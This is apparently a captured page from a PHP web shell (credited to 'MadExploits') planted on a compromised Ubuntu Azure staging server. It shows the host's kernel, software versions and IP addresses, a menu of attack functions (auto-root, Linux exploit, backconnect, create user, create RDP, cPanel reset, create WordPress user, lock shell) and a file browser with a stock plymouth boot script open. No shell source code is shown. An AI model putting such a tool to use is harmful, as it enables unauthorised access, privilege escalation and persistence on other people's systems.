Linux quad-clini-stageVM 5.4.0-1109-azure #115~18.04.1-Ubuntu SMP Mon May 22 20:06:37 UTC 2023 x86_64
Apache/2.4.29 (Ubuntu)
: 10.2.0.4 | : 3.16.137.150
Cant Read [ /etc/named.conf ]
7.4.25
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
initramfs-tools /
scripts /
init-premount /
[ HOME SHELL ]
Name
Size
Permission
Action
cloud-initramfs-dyn-netconf
3.48
KB
-rwxr-xr-x
lvm2
629
B
-rwxr-xr-x
plymouth
484
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : plymouth
#!/bin/sh OPTION=FRAMEBUFFER PREREQ="udev" prereqs() { echo "${PREREQ}" } case ${1} in prereqs) prereqs exit 0 ;; esac SPLASH="false" for ARGUMENT in $(cat /proc/cmdline) do case "${ARGUMENT}" in splash*) SPLASH="true" ;; nosplash*|plymouth.enable=0) SPLASH="false" ;; esac done if [ "${SPLASH}" = "true" ] then mkdir -m 0755 /run/plymouth /sbin/plymouthd --mode=boot --attach-to-session --pid-file=/run/plymouth/pid /bin/plymouth --show-splash fi
Close